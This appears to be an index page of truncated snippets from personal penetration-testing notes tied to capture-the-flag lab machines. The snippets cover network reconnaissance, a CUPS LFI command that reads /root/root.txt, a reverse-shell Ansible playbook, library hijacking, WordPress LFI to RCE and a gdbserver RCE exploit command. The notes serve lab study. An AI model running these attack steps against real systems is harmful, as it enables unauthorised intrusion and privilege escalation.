To understand Spring4Shell, it is important that we understand CVE-2010-1622. Spring MVC (Model-View-Controller) is part of the Spring Framework which makes it easy to develop web applications foll...

ARP-SCAN This tool sends a ARP requests to a given IP or network and retrieves the MAC address: arp-scan -I tap0 -g 10.142.111.0/24 FPING Reconnaisance of alive hosts: fping -I ens33 -g 10.10.0....

Finding the Vulnerability First you need to find a script (.sh,.pl,.cgi,etc.), most commonly under cgi-bin folder, for this task the best tool is nikto: nikto -h <IP> Testing the Vulnerabil...

LFI An LFI is present if you have access to the system, you need to change the ErrorLog path for the file that you want to read: cupsctl ErrorLog="/root/root.txt" Then from the web server we need ...

YML RCE Example to obtain a reverse shell using test.yml file: --- - name: Display known facts for host hosts: 127.0.0.1 sudo: true sudo_user: root connection: local gather_facts: false ...

Drupal exploitation/enumeration Github: drupwn In order to make this exploit working first run the python setup.py script: python setup.py install Then run the enumeration/exploitation binary ...

Libraries hijacking If there is a script using certain library without full path, you can hijack and impersonate commands as the user executing the script: alice@wonderland:/root$ sudo -l User ali...

For Windows and Linux the following command shows TCP services running: netstat -ano -p tcp Also for linux you can use the following command: ss -tulnp Examples: [[StreamIO#^1d2840]] [[Antique#...

Content WordPress Local File Inclusion Vulnerability (LFI) LFI to RCE (Abusing /proc/PID/cmdline) Gdbserver RCE Vulnerability Abusing Screen (Privilege Escalation) [Session synchronizatio...

If the gdbserver is 9.2 or prior it is vulnerable to a RCE exploitation: Exploit: gdbserver sudo python3 gdbserver_rce.py 10.10.11.125:1337 rev.bin Examples: Backdoor